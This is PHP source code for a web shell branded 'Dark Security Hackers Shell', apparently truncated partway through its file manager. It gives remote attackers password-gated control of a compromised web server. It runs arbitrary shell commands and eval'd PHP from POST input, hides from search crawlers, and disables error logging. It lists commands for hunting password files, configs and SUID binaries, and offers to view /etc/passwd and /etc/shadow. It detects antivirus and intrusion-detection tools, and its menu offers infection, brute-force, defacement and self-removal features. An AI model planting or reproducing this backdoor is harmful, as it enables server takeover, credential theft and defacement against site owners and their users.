<?php $auth_pass = "b72d51060d25ff9952dd93dccc5987b1"; $color = "#

1. <?php
2. $auth_pass = "b72d51060d25ff9952dd93dccc5987b1";
3. $color = "#00ff00";
4. $sec = 1;
5. $default_action = 'FilesMan';
6. @define('SELF_PATH', __FILE__);
7.  
8.  
9. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
10. $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "facebook","yahoo");
11. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
12. header('HTTP/1.0 404 Not Found');
13. exit;
14. }
15. }
16. @session_start();
17. @error_reporting(0);
18. @ini_set('error_log',NULL);
19. @ini_set('log_errors',0);
20. @ini_set('max_execution_time',0);
21. @set_time_limit(0);
22. @set_magic_quotes_runtime(0);
23. @define('VERSION' , '2.6.5 by Scr1pt3r');
24. if( get_magic_quotes_gpc() ) {
25. function stripslashes_array($array) {
26. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
27. }
28. $_POST = stripslashes_array($_POST);
29. }
30. function printLogin() {
31. ?>
32. <center>
33. <a href="https://www.facebook.com/DarkSecHackers.gov/"><img src="https://media.giphy.com/media/3oz8xwSHUgfJwjqafm/source.gif" width="7%"></a>
34. <a href="https://www.facebook.com/DarkSecHackers.gov/"><img src="http://darksecurityhackers.gq/administrator/templates/isis/images/logo.png" width="20%"></a>
35. <a href="https://www.facebook.com/DarkSecHackers.gov/"><img src="https://media.giphy.com/media/3oz8xwSHUgfJwjqafm/source.gif" width="7%"><br></a><div>
36. <a href="https://www.facebook.com/Scr1pter/"><img src="http://i.imgur.com/buJXjSg.png" width="15%"></a>
37. <style>
38. input {
39. width: 20%;
40. padding: 10px 15px;
41. margin: 8px 0;
42. display: inline-block;
43. border: 2px solid #ccc;
44. border-radius: 4px;
45. box-sizing: border-box;
46. background: transparent; }
47. body {
48. background-image: url("http://wallpapercave.com/wp/o4aBFsY.jpg");
49. background-size: 100;
50. background-size: cover;
51. background-color: black;
52. background-repeat: no-repeat;
53.  
54. }
55. </style>
56. <br>
57. <br>
58. <br>
59. <br>
60. <br>
61. <font size="10" style="text-shadow:green 0px 0px 10px" face="Courier New">Login</font>
62. <br>
63. <form method=post>
64. <input type=password name=pass>
65. </form>
66. <style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1054.cur), progress !important;}</style>><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Chrome Pointer" style="position:absolute; top: 0px; right: 0px;" />
67. <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">$(document).ready(function() {$(".facebookbox").hover(function() {$(this).stop().animate({right: "0"}, "medium");}, function() {$(this).stop().animate({right: "-250"}, "medium");}, 500);}); </script><style type="text/css">.facebookbox{background:url("http://i.imgur.com/RdNJhwy.jpg") no-repeat scroll left center transparent!important;display:block;float:right;height:270px;padding:0 5px 0 70px;width:245px;z-index:99999;position:fixed;right:-250px;top:40%;}.facebookbox div{border:none;position:relative;display:block;}.facebookbox span{bottom:12px;font:8px"lucida grande",tahoma,verdana,arial,sans-serif;position:absolute;right:6px;text-align:right;z-index:99999;}.facebookbox span a{color:#808080;text-decoration:none;}.facebookbox span a:hover{text-decoration:underline;}</style></head><body bgcolor="Black"><div class="facebookbox"><iframe scrolling="no" frameborder="0" style="border: medium none; overflow: hidden; height: 270px; width: 245px;background:#fff;" src="http://www.facebook.com/plugins/likebox.php?href=https://www.facebook.com/DarkSecHackers.gov/&width=245&colorscheme=light&show_faces=true&connections=9&stream=false&header=false&height=270"></iframe>
68. </center>
69. <?php
70. exit;
71. }
72. if($sec == 1 && !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])]))
73. if( empty( $auth_pass ) ||
74. ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
75. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
76. else
77. printLogin();
78.  
79. if( strtolower( substr(PHP_OS,0,3) ) == "win" )
80. $os = 'win';
81. else
82. $os = 'nix';
83. $safe_mode = @ini_get('safe_mode');
84. $disable_functions = @ini_get('disable_functions');
85. $home_cwd = @getcwd();
86. if( isset( $_POST['c'] ) )
87. @chdir($_POST['c']);
88. $cwd = @getcwd();
89. if( $os == 'win') {
90. $home_cwd = str_replace("\\", "/", $home_cwd);
91. $cwd = str_replace("\\", "/", $cwd);
92. }
93. if( $cwd[strlen($cwd)-1] != '/' )
94. $cwd .= '/';
95.  
96. if($os == 'win')
97. $aliases = array(
98. "List Directory" => "dir",
99. "Find index.php in current dir" => "dir /s /w /b index.php",
100. "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
101. "Show active connections" => "netstat -an",
102. "Show running services" => "net start",
103. "User accounts" => "net user",
104. "Show computers" => "net view",
105. "ARP Table" => "arp -a",
106. "IP Configuration" => "ipconfig /all"
107. );
108. else
109. $aliases = array(
110. "List dir" => "ls -la",
111. "list file attributes on a Linux second extended file system" => "lsattr -va",
112. "show opened ports" => "netstat -an | grep -i listen",
113. "Find" => "",
114. "find all suid files" => "find / -type f -perm -04000 -ls",
115. "find suid files in current dir" => "find . -type f -perm -04000 -ls",
116. "find all sgid files" => "find / -type f -perm -02000 -ls",
117. "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
118. "find config.inc.php files" => "find / -type f -name config.inc.php",
119. "find config* files" => "find / -type f -name \"config*\"",
120. "find config* files in current dir" => "find . -type f -name \"config*\"",
121. "find all writable folders and files" => "find / -perm -2 -ls",
122. "find all writable folders and files in current dir" => "find . -perm -2 -ls",
123. "find all service.pwd files" => "find / -type f -name service.pwd",
124. "find service.pwd files in current dir" => "find . -type f -name service.pwd",
125. "find all .htpasswd files" => "find / -type f -name .htpasswd",
126. "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
127. "find all .bash_history files" => "find / -type f -name .bash_history",
128. "find .bash_history files in current dir" => "find . -type f -name .bash_history",
129. "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
130. "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
131. "Locate" => "",
132. "locate httpd.conf files" => "locate httpd.conf",
133. "locate vhosts.conf files" => "locate vhosts.conf",
134. "locate proftpd.conf files" => "locate proftpd.conf",
135. "locate psybnc.conf files" => "locate psybnc.conf",
136. "locate my.conf files" => "locate my.conf",
137. "locate admin.php files" =>"locate admin.php",
138. "locate cfg.php files" => "locate cfg.php",
139. "locate conf.php files" => "locate conf.php",
140. "locate config.dat files" => "locate config.dat",
141. "locate config.php files" => "locate config.php",
142. "locate config.inc files" => "locate config.inc",
143. "locate config.inc.php" => "locate config.inc.php",
144. "locate config.default.php files" => "locate config.default.php",
145. "locate config* files " => "locate config",
146. "locate .conf files"=>"locate '.conf'",
147. "locate .pwd files" => "locate '.pwd'",
148. "locate .sql files" => "locate '.sql'",
149. "locate .htpasswd files" => "locate '.htpasswd'",
150. "locate .bash_history files" => "locate '.bash_history'",
151. "locate .mysql_history files" => "locate '.mysql_history'",
152. "locate .fetchmailrc files" => "locate '.fetchmailrc'",
153. "locate backup files" => "locate backup",
154. "locate dump files" => "locate dump",
155. "locate priv files" => "locate priv"
156. );
157.  
158. function printHeader() {
159. if(empty($_POST['charset']))
160. $_POST['charset'] = "UTF-8";
161. global $color;
162. ?>
163. <html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title>Dark Security Hackers Shell</title>
164. <style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1054.cur), progress !important;}</style><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Chrome Pointer" style="position:absolute; top: 0px; right: 0px;" /></a>
165.  
166. <style>
167. body {background-color:#000;color:#fff;}
168. body,td,th { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }
169. span,h1,a { color:<?=$color?> !important; }
170. span { font-weight: bolder; }
171. h1 { border:1px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;margin:0px; }
172. div.content { padding: 5px;margin-left:5px;}
173. a { text-decoration:none; }
174. a:hover { background:#000000; }
175. .ml1 { border:1px solid #444;padding:5px;margin:0;overflow: auto; }
176. .bigarea { width:100%;height:250px; }
177. input, textarea, select { margin:0;color:#00ff00;background-color:#000;border:1px solid <?=$color?>; font: 9pt
178.  
179. Monospace,"Courier New"; }
180. form { margin:0px; }
181. #toolsTbl { text-align:center; }
182. .toolsInp { width: 80%; }
183. .main th {text-align:left;}
184. .main tr:hover{background-color:#5e5e5e;}
185. .main td, th{vertical-align:middle;}
186. pre {font-family:Courier,Monospace;}
187. #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression
188.  
189. (document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression
190.  
191. (document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
192. </style>
193. <script>
194. function set(a,c,p1,p2,p3,p4,charset) {
195. if(a != null)document.mf.a.value=a;
196. if(c != null)document.mf.c.value=c;
197. if(p1 != null)document.mf.p1.value=p1;
198. if(p2 != null)document.mf.p2.value=p2;
199. if(p3 != null)document.mf.p3.value=p3;
200. if(p4 != null)document.mf.p4.value=p4;
201. if(charset != null)document.mf.charset.value=charset;
202. }
203. function g(a,c,p1,p2,p3,charset) {
204. set(a,c,p1,p2,p3,charset);
205. document.mf.submit();
206. }
207. function da2(a,c,p1,p2,p3,p4,charset) {
208. set(a,c,p1,p2,p3,p4,charset);
209. document.mf.submit();
210. }
211. function a(a,c,p1,p2,p3,charset) {
212. set(a,c,p1,p2,p3,charset);
213. var params = "ajax=true";
214. for(i=0;i<document.mf.elements.length;i++)
215. params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements
216.  
217. [i].value);
218. sr('<?=$_SERVER['REQUEST_URI'];?>', params);
219. }
220. function sr(url, params) {
221. if (window.XMLHttpRequest) {
222. req = new XMLHttpRequest();
223. req.onreadystatechange = processReqChange;
224. req.open("POST", url, true);
225. req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
226. req.send(params);
227. }
228. else if (window.ActiveXObject) {
229. req = new ActiveXObject("Microsoft.XMLHTTP");
230. if (req) {
231. req.onreadystatechange = processReqChange;
232. req.open("POST", url, true);
233. req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
234. req.send(params);
235. }
236. }
237. }
238. function processReqChange() {
239. if( (req.readyState == 4) )
240. if(req.status == 200) {
241.  
242. //alert(req.responseText);
243. var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
244. var arr=reg.exec(req.responseText);
245. eval(arr[2].substr(0, arr[1]));
246. }
247. else alert("Request error!");
248. }
249. </script>
250. <head><body><div style="position:absolute;width:100%;top:0;left:0;">
251. <form method=post name=mf style='display:none;'>
252. <input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>
253. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
254. <input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>
255. <input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>
256. <input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>
257. <input type=hidden name=p4 value='<?=isset($_POST['p4'])?htmlspecialchars($_POST['p4']):''?>'>
258. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
259. </form>
260. <?php
261. $freeSpace = @diskfreespace($GLOBALS['cwd']);
262. $totalSpace = @disk_total_space($GLOBALS['cwd']);
263. $totalSpace = $totalSpace?$totalSpace:1;
264. $release = @php_uname('r');
265. $kernel = @php_uname('s');
266. $millink='http://www.exploit-db.com/search/?action=search&filter_description=';
267. // fixme
268. $millink2='http://www.1337day.com/search';
269.  
270. if( strpos('Linux', $kernel) !== false )
271. $millink .= urlencode( '' . substr($release,0,6) );
272. else
273. $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
274. if(!function_exists('posix_getegid')) {
275. $user = @get_current_user();
276. $uid = @getmyuid();
277. $gid = @getmygid();
278. $group = "?";
279. } else {
280. $uid = @posix_getpwuid(@posix_geteuid());
281. $gid = @posix_getgrgid(@posix_getegid());
282. $user = $uid['name'];
283. $uid = $uid['uid'];
284. $group = $gid['name'];
285. $gid = $gid['gid'];
286. }
287.  
288. $cwd_links = '';
289. $path = explode("/", $GLOBALS['cwd']);
290. $n=count($path);
291. for($i=0;$i<$n-1;$i++) {
292. $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
293. for($j=0;$j<=$i;$j++)
294. $cwd_links .= $path[$j].'/';
295. $cwd_links .= "\")'>".$path[$i]."/</a>";
296. }
297. $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
298. $opt_charsets = '';
299. foreach($charsets as $item)
300. $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.
301.  
302. $item.'</option>';
303. $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe
304.  
305. mode'=>'SafeMode','String
306.  
307. tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network','Infect'=>'Infect','Readable'=>'Readable','Test'=>'Te
308.  
309. st','CgiShell'=>'CgiShell','Symlink'=>'Symlink','Deface'=>'Deface', 'Domain'=>'Domain','ZHposter'=>'ZHposter');
310.  
311. if(!empty($GLOBALS['auth_pass']))
312. $m['Logout'] = 'Logout';
313. $m['Self remove'] = 'SelfRemove';
314. $menu = '';
315. foreach($m as $k => $v)
316. $menu .= '<th width="'.(int)(1/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',
317.  
318. \'\')">'.$k.'</a> ]</th>';
319. $drives = "";
320. if ($GLOBALS['os'] == 'win') {
321. foreach( range('a','z') as $drive )
322. if (is_dir($drive.':\\'))
323. $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
324. }
325. echo '<iframe width="1" height="1" src="http://www.youtube.com/embed/cWXZlIwAoYY?
326. &autoplay=1&loop=1&playlist=cWXZlIwAoYY" frameborder="0" allowfullscreen></iframe>
327. <center><a href="https://www.facebook.com/DarkSecHackers.gov/"><img
328.  
329. src="https://media.giphy.com/media/3oz8xwSHUgfJwjqafm/source.gif" width="7%"></a>
330. <a href="https://www.facebook.com/DarkSecHackers.gov/"><img src="http://darksecurityhackers.gq/administrator/templates/isis/images/logo.png"
331.  
332. width="30%"></a>
333. <a href="https://www.facebook.com/DarkSecHackers.gov/"><img
334.  
335. src="https://media.giphy.com/media/3oz8xwSHUgfJwjqafm/source.gif" width="7%"></a>
336. <table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>System<br>User<br>Php<br>Hdd<br>Cwd'.
337.  
338. ($GLOBALS['os'] == 'win'?'<br>Drives':'').'</span></td>'.
339. '<td>:<nobr>'.substr(@php_uname(), 0, 120).' <a href="http://www.google.com/search?q='.urlencode
340.  
341. (@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[exploit-db]</a> <a href="'.
342.  
343. $millink2.'" target=_blank>[1337day]</a>
344. Download : <a href="http://www.google.com" target=_blank>[SideKick1]</a>
345. <a href="http://www.google.com" target=_blank>[SideKick2]</a>
346. </nobr><br>:'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' ) <span>Usefull Locals:</span> '.rootxpL
347.  
348. ().' <br>:'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=<?=
349.  
350. $color?><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span>
351.  
352. '.date('Y-m-d H:i:s').'<br>:'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/
353.  
354. $totalSpace*100).'%)<br>:'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS
355.  
356. ['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.
357. '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup
358.  
359. label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER
360.  
361. ["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
362. '<table cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">';
363. }
364.  
365. function printFooter() {
366. $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not
367.  
368. writable ]</font>";
369. ?>
370. </div>
371. <table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%">
372. <tr>
373. <td><form onSubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input
374.  
375. class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit
376.  
377. value=">>"></form></td>
378. <td><form onSubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input
379.  
380. class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
381. </tr>
382. <tr>
383. <td><form onSubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make
384.  
385. dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td>
386. <td><form onSubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make
387.  
388. file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td>
389. </tr>
390. <tr>
391. <td><form onSubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input
392.  
393. class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
394. <td><form method='post' ENCTYPE='multipart/form-data'>
395. <input type=hidden name=a value='FilesMAn'>
396. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
397. <input type=hidden name=p1 value='uploadFile'>
398. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
399. <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit
400.  
401. value=">>"></form><?=$is_writable?></td>
402. </tr>
403.  
404. </table>
405. </div>
406. </body></html>
407. <?php
408. }
409. if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) {
410.  
411. function posix_getpwuid($p) { return false; } }
412. if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) {
413.  
414. function posix_getgrgid($p) { return false; } }
415. function ex($in) {
416. $out = '';
417. if(function_exists('exec')) {
418. @exec($in,$out);
419. $out = @join("\n",$out);
420. }elseif(function_exists('passthru')) {
421. ob_start();
422. @passthru($in);
423. $out = ob_get_clean();
424. }elseif(function_exists('system')) {
425. ob_start();
426. @system($in);
427. $out = ob_get_clean();
428. }elseif(function_exists('shell_exec')) {
429. $out = shell_exec($in);
430. }elseif(is_resource($f = @popen($in,"r"))) {
431. $out = "";
432. while(!@feof($f))
433. $out .= fread($f,1024);
434. pclose($f);
435. }
436. return $out;
437. }
438. function viewSize($s) {
439. if($s >= 1073741824)
440. return sprintf('%1.2f', $s / 1073741824 ). ' GB';
441. elseif($s >= 1048576)
442. return sprintf('%1.2f', $s / 1048576 ) . ' MB';
443. elseif($s >= 1024)
444. return sprintf('%1.2f', $s / 1024 ) . ' KB';
445. else
446. return $s . ' B';
447. }
448.  
449. function perms($p) {
450. if (($p & 0xC000) == 0xC000)$i = 's';
451. elseif (($p & 0xA000) == 0xA000)$i = 'l';
452. elseif (($p & 0x8000) == 0x8000)$i = '-';
453. elseif (($p & 0x6000) == 0x6000)$i = 'b';
454. elseif (($p & 0x4000) == 0x4000)$i = 'd';
455. elseif (($p & 0x2000) == 0x2000)$i = 'c';
456. elseif (($p & 0x1000) == 0x1000)$i = 'p';
457. else $i = 'u';
458. $i .= (($p & 0x0100) ? 'r' : '-');
459. $i .= (($p & 0x0080) ? 'w' : '-');
460. $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
461. $i .= (($p & 0x0020) ? 'r' : '-');
462. $i .= (($p & 0x0010) ? 'w' : '-');
463. $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
464. $i .= (($p & 0x0004) ? 'r' : '-');
465. $i .= (($p & 0x0002) ? 'w' : '-');
466. $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
467. return $i;
468. }
469. function viewPermsColor($f) {
470. if (!@is_readable($f))
471. return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
472. elseif (!@is_writable($f))
473. return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
474. else
475. return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>';
476. }
477. if(!function_exists("scandir")) {
478. function scandir($dir) {
479. $dh = opendir($dir);
480. while (false !== ($filename = readdir($dh))) {
481. $files[] = $filename;
482. }
483. return $files;
484. }
485. }
486. function which($p) {
487. $path = ex('which '.$p);
488. if(!empty($path))
489. return $path;
490. return false;
491. }
492. function actionSecInfo() {
493. printHeader();
494. echo '<h1>Server security information</h1><div class=content>';
495. function showSecParam($n, $v) {
496. $v = trim($v);
497. if($v) {
498. echo '<span>'.$n.': </span>';
499. if(strpos($v, "\n") === false)
500. echo $v.'<br>';
501. else
502. echo '<pre class=ml1>'.$v.'</pre>';
503. }
504. }
505.  
506. showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
507. if(function_exists('apache_get_modules'))
508. showSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
509. showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
510. showSecParam('Open base dir', @ini_get('open_basedir'));
511. showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
512. showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
513. showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
514. $temp=array();
515. if(function_exists('mysql_get_client_info'))
516. $temp[] = "MySql (".mysql_get_client_info().")";
517. if(function_exists('mssql_connect'))
518. $temp[] = "MSSQL";
519. if(function_exists('pg_connect'))
520. $temp[] = "PostgreSQL";
521. if(function_exists('oci_connect'))
522. $temp[] = "Oracle";
523. showSecParam('Supported databases', implode(', ', $temp));
524. echo '<br>';
525.  
526. if( $GLOBALS['os'] == 'nix' ) {
527. $userful = array
528.  
529. ('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
530. $danger = array
531.  
532. ('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','p
533.  
534. ortsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja
535.  
536. ');
537. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
538. showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g
539.  
540. (\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
541. showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g
542.  
543. (\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
544. showSecParam('OS version', @file_get_contents('/proc/version'));
545. showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
546. if(!$GLOBALS['safe_mode']) {
547. echo '<br>';
548. $temp=array();
549. foreach ($userful as $item)
550. if(which($item)){$temp[]=$item;}
551. showSecParam('Userful', implode(', ',$temp));
552. $temp=array();
553. foreach ($danger as $item)
554. if(which($item)){$temp[]=$item;}
555. showSecParam('Danger', implode(', ',$temp));
556. $temp=array();
557. foreach ($downloaders as $item)
558. if(which($item)){$temp[]=$item;}
559. showSecParam('Downloaders', implode(', ',$temp));
560. echo '<br/>';
561. showSecParam('Hosts', @file_get_contents('/etc/hosts'));
562. showSecParam('HDD space', ex('df -h'));
563. showSecParam('Mount options', @file_get_contents('/etc/fstab'));
564. }
565. } else {
566. showSecParam('OS Version',ex('ver'));
567. showSecParam('Account Settings',ex('net accounts'));
568. showSecParam('User Accounts',ex('net user'));
569. }
570. echo '</div>';
571. printFooter();
572. }
573.  
574. function actionPhp() {
575. if( isset($_POST['ajax']) ) {
576. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
577. ob_start();
578. eval($_POST['p1']);
579. $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById
580.  
581. ('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
582. echo strlen($temp), "\n", $temp;
583. exit;
584. }
585. printHeader();
586. if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
587. echo '<h1>PHP info</h1><div class=content>';
588. ob_start();
589. phpinfo();
590. $tmp = ob_get_clean();
591. $tmp = preg_replace('!body {.*}!msiU','',$tmp);
592. $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
593. $tmp = preg_replace('!h1!msiU','h2',$tmp);
594. $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
595. $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
596. echo $tmp;
597. echo '</div><br>';
598. }
599. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
600. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
601. echo '<h1>Execution PHP-code</h1> example : echo file_get_contents(`/etc/passwd`); <div
602.  
603. class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g
604.  
605. (null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?
606.  
607. htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
608. echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'>
609.  
610. send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
611. if(!empty($_POST['p1'])) {
612. ob_start();
613. eval($_POST['p1']);
614. echo htmlspecialchars(ob_get_clean());
615. }
616. echo '</pre></div>';
617. printFooter();
618. }
619.  
620. function actionFilesMan() {
621. printHeader();
622. echo '<h1>File manager</h1><div class=content>';
623. if(isset($_POST['p1'])) {
624. switch($_POST['p1']) {
625. case 'uploadFile':
626. if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
627. echo "Can't upload file!";
628. break;
629. break;
630. case 'mkdir':
631. if(!@mkdir($_POST['p2']))
632. echo "Can't create new dir";
633. break;
634. case 'delete':
635. function deleteDir($path) {
636. $path = (substr($path,-1)=='/') ? $path:$path.'/';
637. $dh = opendir($path);
638. while ( ($item = readdir($dh) ) !== false) {
639. $item = $path.$item;
640. if ( (basename($item) == "..") || (basename($item) == ".") )
641. continue;
642. $type = filetype($item);
643. if ($type == "dir")
644. deleteDir($item);
645. else
646. @unlink($item);
647. }
648. closedir($dh);
649. rmdir($path);
650. }
651. if(is_array(@$_POST['f']))
652. foreach($_POST['f'] as $f) {
653. $f = urldecode($f);
654. if(is_dir($f))
655. deleteDir($f);
656. else
657. @unlink($f);
658. }
659. break;
660. case 'paste':
661. if($_SESSION['act'] == 'copy') {
662. function copy_paste($c,$s,$d){
663. if(is_dir($c.$s)){
664. mkdir($d.$s);
665. $h = opendir($c.$s);
666. while (($f = readdir($h)) !== false)
667. if (($f != ".") and ($f != "..")) {
668. copy_paste($c.$s.'/',$f, $d.$s.'/');
669. }
670. } elseif(is_file($c.$s)) {
671. @copy($c.$s, $d.$s);
672. }
673. }
674. foreach($_SESSION['f'] as $f)
675. copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
676.  
677.  
678. } elseif($_SESSION['act'] == 'move') {
679. function move_paste($c,$s,$d){
680. if(is_dir($c.$s)){
681. mkdir($d.$s);
682. $h = opendir($c.$s);
683. while (($f = readdir($h)) !== false)
684. if (($f != ".") and ($f != "..")) {
685. copy_paste($c.$s.'/',$f, $d.$s.'/');
686. }
687. } elseif(is_file($c.$s)) {
688. @copy($c.$s, $d.$s);
689. }
690. }
691. foreach($_SESSION['f'] as $f)
692. @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
693. }
694. unset($_SESSION['f']);
695. break;
696. default:
697. if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
698. $_SESSION['act'] = @$_POST['p1'];
699. $_SESSION['f'] = @$_POST['f'];
700. foreach($_SESSION['f'] as $k => $f)
701. $_SESSION['f'][$k] = urldecode($f);
702. $_SESSION['cwd'] = @$_POST['c'];
703. }
704. break;
705. }
706. echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
707. }
708. $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
709. if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
710. global $sort;
